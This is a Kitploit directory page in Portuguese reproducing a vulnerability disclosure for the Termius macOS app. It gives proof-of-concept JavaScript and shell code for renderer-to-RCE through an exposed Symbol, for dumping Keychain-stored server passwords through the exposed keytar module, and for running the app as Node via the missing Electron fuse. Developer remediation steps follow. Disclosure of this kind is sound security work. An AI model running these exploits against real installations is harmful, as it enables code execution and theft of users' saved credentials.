Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-Termius — Divulgação de vulnerabilidades com PoCs para três falhas críticas do Termius no macOS: Execução Remota de Código via módulos Node expostos, Elevação Local de Privilégios com extração de credenciais e bypass do Electron fuse. Inclui orientações de remediação. | Kitploit
Ferramentas/GitHubGitHub/nicetop1027/cve-2026-termius
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoPapers e PesquisaConfiguração IncorretaAprendizado e Educação
GitHubnicetop1027/cve-2026-termius

CVE-2026-Termius

Divulgação de vulnerabilidades com PoCs para três falhas críticas do Termius no macOS: Execução Remota de Código via módulos Node expostos, Elevação Local de Privilégios com extração de credenciais e bypass do Electron fuse. Inclui orientações de remediação.

Ver Repositório
3há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Relatório de Vulnerabilidades do Aplicativo Termius para macOS (CVE-2026-Termius)

Alvo: Termius (macOS) Versão Testada: Mais recente (em janeiro de 2026) Impacto: Execução Remota de Código (RCE), Escalação Local de Privilégios (LPE), Bypass de Segurança do Aplicativo

🚨 Resumo Executivo

Três vulnerabilidades críticas foram identificadas no aplicativo Termius para macOS que permitem a um atacante:

  1. Executar Comandos Arbitrários do Sistema (RCE) através de um Symbol oculto (backdoor) exposto ao renderizador.
  2. Despejar Todas as Senhas Salvas (LPE) abusando do módulo nativo keytar exposto.
  3. Ignorar a Segurança do Aplicativo por Completo usando o fuse ausente ELECTRON_RUN_AS_NODE.

1. Crítico: Execução Remota de Código (RCE) via Symbol Oculto

Detalhes da Vulnerabilidade

O aplicativo expõe módulos poderosos do Node.js (child_process, fs, electron) ao processo de renderização (a parte de interface web do aplicativo). Esses módulos ficam ocultos atrás de um Symbol global no objeto window para obscurecê-los, mas não são isolados com segurança.

  • Padrão de Código Vulnerável:
    root@kitploit:~
    // No código-fonte extraído do aplicativo
    window[Symbol.for("preloadedModulesKey")] = {
        child_process: require('child_process'),
        // ...
    };
    

Exploit (PoC)

Um atacante que consiga executar Cross-Site Scripting (XSS) pode escalar imediatamente para RCE usando este symbol exposto.

poc_rce_via_symbol.js:

root@kitploit:~
// 1. Reconstrua a chave oculta usando Symbol.for (Registro Global)
const hiddenKey = Symbol.for("preloadedModulesKey");

// 2. Acesse o objeto backdoor exposto
const backdoor = window[hiddenKey];

if (backdoor && backdoor.child_process) {
    console.log("RCE Target Acquired.");
    // 3. Execute um comando arbitrário do sistema (ex.: Calculadora)
    backdoor.child_process.exec("open -a Calculator");
}

2. Crítico: Despejo Local de Credenciais (LPE)

Detalhes da Vulnerabilidade

O módulo nativo do Node.js keytar, que o Termius usa para interagir com o Keychain do macOS, também é exposto através do mesmo Symbol oculto. Isso permite que qualquer script executado dentro do contexto do aplicativo (ex.: um plugin malicioso, XSS ou injeção de processo local) consulte e recupere senhas em texto puro de todos os servidores salvos.

Exploit (PoC)

poc_lpe_dump_creds.js:

root@kitploit:~
const hiddenKey = Symbol.for("preloadedModulesKey");
const modules = window[hiddenKey];

// Encontre o módulo keytar (o nome pode variar ligeiramente)
const keytarModuleName = Object.keys(modules).find(k => k.includes("keytar"));
const keytar = modules[keytarModuleName];

// Despeje as credenciais do serviço padrão
keytar.findCredentials("Termius").then(credentials => {
    console.log("🔥🔥🔥 DUMPED CREDENTIALS 🔥🔥🔥");
    console.table(credentials);
});

3. Crítico: Fuse do Electron Ausente (RunAsNode)

Detalhes da Vulnerabilidade

O binário do Termius não desativa o fuse ELECTRON_RUN_AS_NODE. Esta é uma configuração de segurança crítica que permite a qualquer usuário local executar o binário assinado do Termius como um executável Node.js padrão. Isso contorna completamente as verificações de integridade da assinatura de código do macOS para a lógica do aplicativo.

Exploit (PoC)

poc_fuse.sh:

root@kitploit:~
# Execute o Termius como Node.js, rodando código arbitrário
ELECTRON_RUN_AS_NODE=1 /Applications/Termius.app/Contents/MacOS/Termius -e 'require("child_process").exec("open -a Calculator")'

Recomendações de Correção (Para Desenvolvedores)

  1. Desative os Fuses do Electron: Desative explicitamente RunAsNode e EnableNodeCliInspectArguments usando @electron/fuses durante o build.
  2. Remova a Exposição do Symbol Global: Não anexe módulos sensíveis ao window ou ao global. Use contextBridge.exposeInMainWorld com uma superfície de API restrita que exponha apenas as funções necessárias, não módulos inteiros.
  3. Sanitize o IPC: Garanta que toda a Comunicação Interprocessos (IPC) seja estritamente tipada e validada.

Relatório gerado pelo Agente Antigravity

Baixar ferramenta